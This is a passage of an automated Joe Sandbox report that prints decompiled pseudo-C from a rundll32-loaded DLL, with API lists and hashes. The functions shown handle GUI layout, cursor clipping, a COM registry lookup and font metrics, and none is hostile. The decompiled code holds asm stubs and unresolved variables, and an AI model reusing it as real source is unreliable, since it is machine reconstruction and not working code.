                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Local$FreeUnlock$TextWindow$AllocException@8InvalidateLengthLockRectThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1615311496-0
                                                                                                        • Opcode ID: abbe6a63ff4c480e8b6d0ff643644af9efc860aaee534bda4170270ffd9cdcd1
                                                                                                        • Instruction ID: 90872651096951830237a12cadd320912b739d3409e77534ecc1a241206bc270
                                                                                                        • Opcode Fuzzy Hash: abbe6a63ff4c480e8b6d0ff643644af9efc860aaee534bda4170270ffd9cdcd1
                                                                                                        • Instruction Fuzzy Hash: 6E21927A100210BBEB129F64CC89B6E77F9FF98B51F00441EF94AD9161CB34E680CB21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 98%
                                                                                                        			E10004820(intOrPtr __ecx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                        				intOrPtr _v56;
                                                                                                        				struct tagRECT _v76;
                                                                                                        				intOrPtr _v84;
                                                                                                        				struct tagRECT _v104;
                                                                                                        				struct tagRECT _v120;
                                                                                                        				intOrPtr _v124;
                                                                                                        				intOrPtr _v128;
                                                                                                        				intOrPtr _v132;
                                                                                                        				signed int _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				intOrPtr _v148;
                                                                                                        				intOrPtr _v152;
                                                                                                        				intOrPtr _v156;
                                                                                                        				char _v160;
                                                                                                        				intOrPtr _v164;
                                                                                                        				char _v168;
                                                                                                        				intOrPtr _v172;
                                                                                                        				intOrPtr _v176;
                                                                                                        				intOrPtr _v180;
                                                                                                        				intOrPtr _v184;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t99;
                                                                                                        				signed int _t103;
                                                                                                        				signed int _t104;
                                                                                                        				signed int _t107;
                                                                                                        				signed int _t111;
                                                                                                        				signed int _t114;
                                                                                                        				signed int _t122;
                                                                                                        				intOrPtr _t137;
                                                                                                        				signed int _t138;
                                                                                                        				void* _t150;
                                                                                                        				intOrPtr _t187;
                                                                                                        				signed int _t194;
                                                                                                        				intOrPtr _t199;
                                                                                                        				signed int _t208;
                                                                                                        				intOrPtr* _t209;
                                                                                                        				void* _t214;
                                                                                                        				void* _t218;
                                                                                                        				intOrPtr* _t219;
                                                                                                        
                                                                                                        				_v84 = __ecx;
                                                                                                        				_t99 = E10004630(__ecx);
                                                                                                        				_t214 = _t99;
                                                                                                        				if(_t214 != 0) {
                                                                                                        					GetClientRect( *(_t214 + 0x20),  &_v104);
                                                                                                        					InflateRect( &_v104, 0xffffffff, 0xffffffff);
                                                                                                        					_t103 = E10011632(_t214);
                                                                                                        					__eflags = _t103 & 0x00100000;
                                                                                                        					if((_t103 & 0x00100000) != 0) {
                                                                                                        						_t7 =  &(_v104.bottom);
                                                                                                        						 *_t7 = _v104.bottom + 1;
                                                                                                        						__eflags =  *_t7;
                                                                                                        					}
                                                                                                        					_t104 = E10011632(_t214);
                                                                                                        					__eflags = _t104 & 0x00200000;
                                                                                                        					if((_t104 & 0x00200000) != 0) {
                                                                                                        						_t11 =  &(_v104.right);
                                                                                                        						 *_t11 = _v104.right + 1;
                                                                                                        						__eflags =  *_t11;
                                                                                                        					}
                                                                                                        					_t150 = SendMessageA;
                                                                                                        					SendMessageA( *(_t214 + 0x20), 0xb2, 0,  &_v76);
                                                                                                        					_t107 = IsRectEmpty( &_v76);
                                                                                                        					__eflags = _t107;
                                                                                                        					_t218 = SetRect;
                                                                                                        					if(_t107 != 0) {
                                                                                                        						SetRect( &_v76, 4, 4, 4, 4);
                                                                                                        					}
                                                                                                        					SetRect( &_v120, _v76.left - _v104.left, _v76.top - _v104.top, _v76.left - _v104.left, _v76.top - _v104.top);
                                                                                                        					_t111 = E10011632(_t214);
                                                                                                        					__eflags = _t111 & 0x00100000;
                                                                                                        					if((_t111 & 0x00100000) != 0) {
                                                                                                        						_t24 =  &(_v120.bottom);
                                                                                                        						 *_t24 = _v120.bottom + 1;
                                                                                                        						__eflags =  *_t24;
                                                                                                        					}
                                                                                                        					_t166 = _t214;
                                                                                                        					__eflags = E10011632(_t214) & 0x00200000;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						_t28 =  &(_v120.right);
                                                                                                        						 *_t28 = _v120.right + 1;
                                                                                                        						__eflags =  *_t28;
                                                                                                        					}
                                                                                                        					_push(SendMessageA( *(_t214 + 0x20), 0x31, 0, 0));
                                                                                                        					_t114 = E10009228(_t150, _t166, _t214, _t218, __eflags);
                                                                                                        					__eflags = _t114;
                                                                                                        					_t219 = _a4;
                                                                                                        					_v104.bottom = 0;
                                                                                                        					if(_t114 != 0) {
                                                                                                        						_v104.right =  *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x28))))(_t114);
                                                                                                        					}
                                                                                                        					_t199 = _v120.bottom;
                                                                                                        					_v128 = _v104.right;
                                                                                                        					_v132 = _v104.top - _v120.top;
                                                                                                        					_v140 = _t199;
                                                                                                        					_v140 = _v124 + _t199;
                                                                                                        					_v136 = _v104.left + _v120.left;
                                                                                                        					_v128 = 0x7fffffff;
                                                                                                        					E100085BB(_t219, 1);
                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x1c))))();
                                                                                                        					E10008722(_t219, 0, 0, 0, 0);
                                                                                                        					_t154 = _v120.bottom;
                                                                                                        					_t122 = E1001F83B(_t214,  *((intOrPtr*)(_v120.bottom + 0x7c)), _t219,  &_v160,  *((intOrPtr*)(_v120.bottom + 0x7c)),  *((intOrPtr*)(_v120.bottom + 0x80)));
                                                                                                        					__eflags = _t122;
                                                                                                        					if(_t122 == 0) {
                                                                                                        						GetTextMetricsA( *(_t219 + 8),  &(_v76.bottom));
                                                                                                        						_t194 = _v56 + _v76.top + _v144;
                                                                                                        						__eflags = _t194;
                                                                                                        						_v136 = _t194;
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x20))))(0xffffffff);
                                                                                                        					E10008BD3(_t219,  &(_v104.bottom), _v144 - _v128, _v140 - _v124);
                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x48))))( &_v104, _v148 - _v156 + _v140 + _v132, _v144 - _v152 + _v136 + _v128);
                                                                                                        					E1001F83B(_t214,  &_v168, _t219,  &_v168,  *((intOrPtr*)(_t154 + 0x7c)),  *((intOrPtr*)(_t154 + 0x80)));
                                                                                                        					_v184 = _v184 - _v168;
                                                                                                        					_v180 = _v180 - _v164;
                                                                                                        					_t187 = _v176 + _v160;
                                                                                                        					_t137 = _v172 + _v156;
                                                                                                        					_t208 = _v136;
                                                                                                        					__eflags = _t208;
                                                                                                        					_v176 = _t187;
                                                                                                        					_v172 = _t137;
                                                                                                        					if(_t208 != 0) {
                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x28))))(_t208);
                                                                                                        						_t137 = _v148;
                                                                                                        						_t187 = _v152;
                                                                                                        					}
                                                                                                        					_t209 = _a8;
                                                                                                        					_t138 = _t137 - _v152;
                                                                                                        					__eflags = _t138;
                                                                                                        					 *_t209 = _t187 - _v156;
                                                                                                        					 *(_t209 + 4) = _t138;
                                                                                                        					E1002174D(_t219, _t209);
                                                                                                        					return 1;
                                                                                                        				} else {
                                                                                                        					return _t99;
                                                                                                        				}
                                                                                                        			}

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$MessageSend$ClientEmptyInflate
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 4200520382-440804003
                                                                                                        • Opcode ID: 2abcfaea274a2369570987d7606b8ce910d31afa8cd17898d7b212efd0927606
                                                                                                        • Instruction ID: 0ec299595f4385728e86dd1fcda15854f36270291178d9ea1715332580119b07
                                                                                                        • Opcode Fuzzy Hash: 2abcfaea274a2369570987d7606b8ce910d31afa8cd17898d7b212efd0927606
                                                                                                        • Instruction Fuzzy Hash: D28100B5208301AFD308CF68C890A6FB7E9FFC8754F008A1DF99597295DA70E945CB96
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E1000E98B(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                                                                                                        				int _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				int _v16;
                                                                                                        				int _v20;
                                                                                                        				struct tagRECT _v36;
                                                                                                        				void* _v40;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t61;
                                                                                                        				int _t62;
                                                                                                        				signed int _t64;
                                                                                                        				void* _t72;
                                                                                                        				intOrPtr* _t85;
                                                                                                        				signed int _t87;
                                                                                                        				struct HWND__* _t91;
                                                                                                        				void* _t92;
                                                                                                        
                                                                                                        				_t72 = __ecx;
                                                                                                        				_t75 = _a28;
                                                                                                        				_v8 = 0;
                                                                                                        				_v12 = _a28;
                                                                                                        				_v16 = 0;
                                                                                                        				_v20 = 0;
                                                                                                        				if(_a24 == 0) {
                                                                                                        					GetClientRect( *(__ecx + 0x20),  &_v36);
                                                                                                        				} else {
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        				}
                                                                                                        				_t61 = _a16 & 0xffff7fff;
                                                                                                        				_a24 = _t61;
                                                                                                        				if(_t61 == 1) {
                                                                                                        					_t13 =  &_v40;
                                                                                                        					 *_t13 = _v40 & 0x00000000;
                                                                                                        					__eflags =  *_t13;
                                                                                                        				} else {
                                                                                                        					_v40 = BeginDeferWindowPos(8);
                                                                                                        				}
                                                                                                        				_t62 = GetTopWindow( *(_t72 + 0x20));
                                                                                                        				while(1) {
                                                                                                        					_t91 = _t62;
                                                                                                        					if(_t91 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					_t87 = GetDlgCtrlID(_t91) & 0x0000ffff;
                                                                                                        					_t64 = E1000E60C(_t75, _t87, _t91, __eflags, _t91);
                                                                                                        					__eflags = _t87 - _a12;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags = _t87 - _a4;
                                                                                                        						if(__eflags >= 0) {
                                                                                                        							__eflags = _t87 - _a8;
                                                                                                        							if(__eflags <= 0) {
                                                                                                        								__eflags = _t64;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									SendMessageA(_t91, 0x361, 0,  &_v40);
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_v8 = _t91;
                                                                                                        					}
                                                                                                        					_t62 = GetWindow(_t91, 2);
                                                                                                        				}
                                                                                                        				if(_a24 != 1) {
                                                                                                        					__eflags = _a12;
                                                                                                        					if(_a12 != 0) {
                                                                                                        						__eflags = _v8;
                                                                                                        						if(_v8 != 0) {
                                                                                                        							_t62 = E1000E5E5(0, _t75, _t92, _v8);
                                                                                                        							__eflags = _a24 - 2;
                                                                                                        							if(_a24 == 2) {
                                                                                                        								_t85 = _a20;
                                                                                                        								_v36.left = _v36.left +  *_t85;
                                                                                                        								_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
                                                                                                        								_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
                                                                                                        								_t45 =  &(_v36.bottom);
                                                                                                        								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
                                                                                                        								__eflags =  *_t45;
                                                                                                        							}
                                                                                                        							__eflags = _a16 & 0x00008000;
                                                                                                        							if((_a16 & 0x00008000) == 0) {
                                                                                                        								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                                                                                                        								_t62 = E1000C776( &_v40, _v8,  &_v36);
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					__eflags = _v40;
                                                                                                        					if(_v40 != 0) {
                                                                                                        						_t62 = EndDeferWindowPos(_v40);
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					if(_a28 == 0) {
                                                                                                        						_t62 = _a20;
                                                                                                        						 *((intOrPtr*)(_t62 + 8)) = _v20;
                                                                                                        						 *((intOrPtr*)(_t62 + 4)) = 0;
                                                                                                        						 *_t62 = 0;
                                                                                                        						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                                                                                                        					} else {
                                                                                                        						_t62 = CopyRect(_a20,  &_v36);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t62;
                                                                                                        			}






















                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 1228040700-440804003
                                                                                                        • Opcode ID: fc6f81b4aec67edd1c8f02d8465793d820ecf22571a196a6bb79340ddcd46367
                                                                                                        • Instruction ID: 64df79ced9b171c7ce2070e7ad973eb323d41e2062895605a3a6627423db4387
                                                                                                        • Opcode Fuzzy Hash: fc6f81b4aec67edd1c8f02d8465793d820ecf22571a196a6bb79340ddcd46367
                                                                                                        • Instruction Fuzzy Hash: 1F411671A0069ADFEF10DF94C8849EEB7B5FF0D380B15816AE905B6254D730AE40CFA6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 56%
                                                                                                        			E10016E44(void* __ecx, void* __edi, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				void* _v24;
                                                                                                        				struct tagRECT _v40;
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				int _t31;
                                                                                                        				void* _t48;
                                                                                                        				void* _t56;
                                                                                                        				void* _t57;
                                                                                                        				intOrPtr _t58;
                                                                                                        				void* _t63;
                                                                                                        				void* _t68;
                                                                                                        				void* _t69;
                                                                                                        
                                                                                                        				_t57 = __edi;
                                                                                                        				_t49 = __ecx;
                                                                                                        				_t48 = __ecx;
                                                                                                        				_t63 = E1000EFFA(__ecx);
                                                                                                        				_t70 = _t63;
                                                                                                        				if(_t63 == 0) {
                                                                                                        					E1000836F(_t48, _t49, __edi, _t63, _t70);
                                                                                                        				}
                                                                                                        				_push(_t57);
                                                                                                        				_t58 = E1000E5E5(_t48, _t49, _t69, GetParent( *(_t63 + 0x20)));
                                                                                                        				_v8 = _t58;
                                                                                                        				UpdateWindow( *(_t63 + 0x20));
                                                                                                        				_t71 = _t58;
                                                                                                        				if(_t58 != 0) {
                                                                                                        					UpdateWindow( *(_t58 + 0x20));
                                                                                                        					GetClientRect( *(_t58 + 0x20),  &_v40);
                                                                                                        					E10008D4F(_t58,  &_v40);
                                                                                                        					ClipCursor( &_v40);
                                                                                                        				}
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_a12 = E1002E460(_t48 + 0x94, _t56, _t71, _t48, _a8, _a12, 0, _v8);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_t31 = ClipCursor(0);
                                                                                                        				if(_a12 != 0) {
                                                                                                        					_t68 = E1000F8F1(_t48);
                                                                                                        					E10008D4F(_t48,  &_v24);
                                                                                                        					E10008D13(_t68,  &_v24);
                                                                                                        					return SendMessageA( *(_t68 + 0x20), 0x369, GetDlgCtrlID( *(_t48 + 0x20)) & 0x0000ffff,  &_v24);
                                                                                                        				}
                                                                                                        				return _t31;
                                                                                                        			}


















                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 10016E62
                                                                                                        • UpdateWindow.USER32(?), ref: 10016E7C
                                                                                                        • UpdateWindow.USER32(?), ref: 10016E85
                                                                                                        • GetClientRect.USER32 ref: 10016E8E
                                                                                                        • ClipCursor.USER32(?,?), ref: 10016EA3
                                                                                                        • ClipCursor.USER32(00000000,?,?,?,00000000,?), ref: 10016EEA
                                                                                                        • GetDlgCtrlID.USER32 ref: 10016F19
                                                                                                        • SendMessageA.USER32 ref: 10016F2F
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClipCursorUpdateWindow$ClientCtrlException@8H_prolog3MessageParentRectSendThrow
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 2972496148-440804003
                                                                                                        • Opcode ID: 01f6b26919a2de1e7b43cc7ead0e1aea67d7139ecd04a57b7f05599f88471fc9
                                                                                                        • Instruction ID: 76eb8f832bc9fbe54b691d3a70d979fc868f98c1584abcba34e77cf260b628b4
                                                                                                        • Opcode Fuzzy Hash: 01f6b26919a2de1e7b43cc7ead0e1aea67d7139ecd04a57b7f05599f88471fc9
                                                                                                        • Instruction Fuzzy Hash: 33316D3650051AABDB02DF64CC85AEF77BAFF48344B100125FD45BA161EB72AE158BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1002F197(void* _a4, intOrPtr _a8) {
                                                                                                        				void* _v8;
                                                                                                        				void* _v12;
                                                                                                        				int _v16;
                                                                                                        				char* _v20;
                                                                                                        				int _v24;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t35;
                                                                                                        				void* _t37;
                                                                                                        				void* _t42;
                                                                                                        				int* _t43;
                                                                                                        				void* _t46;
                                                                                                        
                                                                                                        				_t43 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				_v20 = E10001DE0(_a8, 0x104);
                                                                                                        				_v16 = 0x104;
                                                                                                        				_t42 = RegOpenKeyA;
                                                                                                        				_v24 = 0;
                                                                                                        				if(RegOpenKeyA(0x80000000, "CLSID",  &_v12) == 0) {
                                                                                                        					_push(_t37);
                                                                                                        					_v8 = 0;
                                                                                                        					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                                                                                                        						_a4 = 0;
                                                                                                        						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                                                                                                        							_t35 = RegQueryValueExA(_a4, 0x100630e0, 0,  &_v24, _v20,  &_v16);
                                                                                                        							asm("sbb esi, esi");
                                                                                                        							_t43 =  ~_t35 + 1;
                                                                                                        							RegCloseKey(_a4);
                                                                                                        						}
                                                                                                        						RegCloseKey(_v8);
                                                                                                        					}
                                                                                                        					RegCloseKey(_v12);
                                                                                                        					_pop(_t37);
                                                                                                        				}
                                                                                                        				E10001C90(_t37, _a8, _t42, _t46, 0xffffffff);
                                                                                                        				return _t43;
                                                                                                        			}

















                                                                                                        APIs
                                                                                                        • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 1002F1CF
                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 1002F1E3
                                                                                                        • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 1002F1FE
                                                                                                        • RegQueryValueExA.ADVAPI32(?,100630E0,00000000,?,?,?), ref: 1002F218
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1002F228
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1002F22D
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1002F232
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpen$QueryValue
                                                                                                        • String ID: CLSID$InProcServer32
                                                                                                        • API String ID: 3523390698-323508013
                                                                                                        • Opcode ID: 383daeb56b95e74e91fc455795058530c7a6b8b4a4811ca313cc554ef7f80c07
                                                                                                        • Instruction ID: 1a2a334b55ca9bb377416e6b09101109fede77e275011b5a38e51e03a7b6de86
                                                                                                        • Opcode Fuzzy Hash: 383daeb56b95e74e91fc455795058530c7a6b8b4a4811ca313cc554ef7f80c07
                                                                                                        • Instruction Fuzzy Hash: C3113776900129BBEF01EF95CC80DEEBBB9EF446E0F108166F904A6160E7319B55DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10011941() {
                                                                                                        				struct HWND__* _v4;
                                                                                                        				void* _v68;
                                                                                                        				void* _v76;
                                                                                                        				int _t4;
                                                                                                        				int _t10;
                                                                                                        				struct HDC__* _t15;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t4 =  *0x10071884; // 0xffffffff
                                                                                                        				if(_t4 == 0xffffffff) {
                                                                                                        					_t15 = GetDC(0);
                                                                                                        					_v4 = 0;
                                                                                                        					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                                                                                        					if(_t18 != 0) {
                                                                                                        						_v68 = SelectObject(_t15, _t18);
                                                                                                        					}
                                                                                                        					GetCharWidthA(_t15, 0x36, 0x36, 0x10071884);
                                                                                                        					if(_t18 != 0) {
                                                                                                        						SelectObject(_t15, _v76);
                                                                                                        						DeleteObject(_t18);
                                                                                                        					}
                                                                                                        					ReleaseDC(0, _t15);
                                                                                                        					_t10 =  *0x10071884; // 0xffffffff
                                                                                                        					return _t10;
                                                                                                        				}
                                                                                                        				return _t4;
                                                                                                        			}











                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 10011953
                                                                                                        • GetSystemMetrics.USER32 ref: 10011977
                                                                                                        • CreateFontA.GDI32(00000000,?,?,?,?,?,10012C6B,00001000,?,?,?,?,?,?), ref: 1001197E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 10011992
                                                                                                        • GetCharWidthA.GDI32(00000000,00000036,00000036,10071884), ref: 100119A2
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 100119B1
                                                                                                        • DeleteObject.GDI32(00000000), ref: 100119B4
                                                                                                        • ReleaseDC.USER32 ref: 100119BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                        • String ID: Marlett
                                                                                                        • API String ID: 1397664628-3688754224
                                                                                                        • Opcode ID: 2f783172487a53513df15c131d4ab524591d224df9edbcf86ca68e63179a48fb
                                                                                                        • Instruction ID: fb1d621fdccb9e40e5e9409823b2dd7cd1bfa2cd1470f5582957c083eed9e7f1
                                                                                                        • Opcode Fuzzy Hash: 2f783172487a53513df15c131d4ab524591d224df9edbcf86ca68e63179a48fb
                                                                                                        • Instruction Fuzzy Hash: 10011E721022347FE3659B268C8DEDF3EADEF46AF5F010504FA5AA6190CB358944C7B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E10032F90(intOrPtr* __ecx) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				struct tagPOINT _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				char _v28;
                                                                                                        				struct tagRECT _v44;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t53;
                                                                                                        				long _t58;
                                                                                                        				intOrPtr _t59;
                                                                                                        				intOrPtr _t61;
                                                                                                        				void* _t63;
                                                                                                        				signed short _t69;
                                                                                                        				signed int _t79;
                                                                                                        				signed int _t80;
                                                                                                        				void* _t87;
                                                                                                        				void* _t91;
                                                                                                        				intOrPtr _t93;
                                                                                                        				long _t94;
                                                                                                        				signed short _t98;
                                                                                                        				signed int _t108;
                                                                                                        				signed short _t111;
                                                                                                        				intOrPtr* _t112;
                                                                                                        				intOrPtr* _t113;
                                                                                                        				void* _t114;
                                                                                                        
                                                                                                        				_t113 = __ecx;
                                                                                                        				GetCursorPos( &_v20);
                                                                                                        				GetWindowRect( *(_t113 + 0x20),  &_v44);
                                                                                                        				_t53 =  *((intOrPtr*)(_t113 + 0x70));
                                                                                                        				_t111 = 0;
                                                                                                        				if(_t53 == 0x7923 || _t53 == 0x7922) {
                                                                                                        					_t93 = _v20.y;
                                                                                                        					if(_t93 >= _v44.top) {
                                                                                                        						__eflags = _t93 - _v44.bottom;
                                                                                                        						if(_t93 > _v44.bottom) {
                                                                                                        							_t111 = 0x791d;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t111 = 0x7917;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if(_t53 == 0x7923 || _t53 == 0x7921) {
                                                                                                        					_t94 = _v20.x;
                                                                                                        					if(_t94 >= _v44.left) {
                                                                                                        						__eflags = _t94 - _v44.right;
                                                                                                        						if(_t94 > _v44.right) {
                                                                                                        							__eflags = _t111;
                                                                                                        							if(_t111 != 0) {
                                                                                                        								__eflags = _t53 - 0x7923;
                                                                                                        								if(_t53 == 0x7923) {
                                                                                                        									_t111 = _t111 + 1;
                                                                                                        									__eflags = _t111;
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								_t111 = 0x791b;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						if(_t111 != 0) {
                                                                                                        							__eflags = _t53 - 0x7923;
                                                                                                        							if(_t53 == 0x7923) {
                                                                                                        								_t111 = _t111 - 1;
